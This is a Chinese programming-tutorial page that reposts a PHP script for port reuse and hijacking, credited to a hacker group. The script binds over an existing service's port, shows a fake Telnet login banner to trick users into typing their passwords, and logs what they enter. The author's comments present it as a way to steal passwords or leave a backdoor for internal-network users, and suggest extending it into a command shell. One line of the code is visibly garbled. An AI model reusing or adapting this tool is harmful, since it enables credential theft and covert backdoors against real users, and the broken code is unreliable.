当前位置: 首页 > 图文教程 > 网络编程 > PHP > PHP下实现端口复用/劫持

PHP
php 清除网页病毒的方法
php 远程关机操作的代码
Zend Studio for Eclipse的java.lang.NullPointerException错误的解决方法
PHP 出现乱码和Sessions验证问题的解决方法!
php2html php生成静态页函数
中英文字符串翻转函数
php escape URL编码
PHP Google的translate API代码
php 文件状态缓存带来的问题
linux下 C语言对 php 扩展
php mssql 数据库分页SQL语句
php IP及IP段进行访问限制的代码
PHP 采集程序 常用函数
php 设计模式之 单例模式
php 设计模式之 工厂模式
php xml-rpc远程调用
php 获取完整url地址
PHP MSSQL 存储过程的方法
PDP Document 代码注释规范
PHP HTML代码串截取代码

PHP下实现端口复用/劫持


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-03   浏览: 147 ::
收藏到网摘: n/a

 

假如监听127.0.0.1 ,访问共网IP不受影响,假如监听公网IP,127。0。0。1等IP不受影响。
这个可以用于欺骗用户密码,因为原来的服务不可用了。或者留成针对内网用户的后门。
最后欢迎加MSN:CQXY[AT]21CN。NET赐教。
#!/usr/bin/php -q
#c0dz by Darkness[BST]
#Team:www.bugkidz.org
#E-mail:cqxy[at]21cn.net
if ($argc != 3 || in_array($argc[1] , array('--help','-h','?')))
{
echo "Use:#./$argv[0] www.bugkidz.org 192.168.0.1 21\r\n";
echo "c0dz By Darkness[BST]";
exit;
}
error_reporting(E_ALL);

set_time_limit(0);

ob_implicit_flush();

$host = $argv[1];
$port = $argv[2];
if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
} /*建立SOCKET*/
socket_set_option($sock,SOL_SOCKET,SO_REUSEADDR,1); /*设置SOCKET连接的属性为SO_REUSEADDR,这样才可以端口复用*/
if (($ret = socket_bind($sock, $host, $port)) < 0) {
echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
}/*绑定端口*/

if (($ret = socket_listen($sock, 5)) < 0) {
echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
} /*开始监听*/


while(true) {

if (($sniffer = socket_accept($sock)) < 0) {
echo "socket_accept() failed: reason: " . socket_strerror($sniffer) . "\n";
break;
}
if ($port == 23)
{
$txt = "Welcome to the Telnet Server\r\n";
$txt .="User:\r\n";
socket_write($sniffer, $txt, strlen($txt));
} /*这里是伪装信息,把自己伪装成原来的TELNET服务器,这样来骗取密码*/

while(true) {

if(($buf _read($sniffer">=@socket_read($sniffer, 2048, PHP_BINARY_READ)) ==false)
{

break;

}

if (!$buf = trim($buf)) {
continue;
}


if ($buf == '!quit') {
break;
}
if ($buf == '!shutdown') {
socket_close($sniffer);
break 2; /*其实这里可以调用system(),搞成一个CMD后门,反正你想怎么改都可以*/
}

$sniff_data = "$buf\r\n";

/* else socket_write($sniffer, $sniff_data, strlen($sniff_data));*/
echo $sniff_data;
/*输出字符串,这里可以加进文件处理,保存密码什么的*/
}
socket_close($sniffer);


}
socket_close($resock);
socket_close($sock);
?>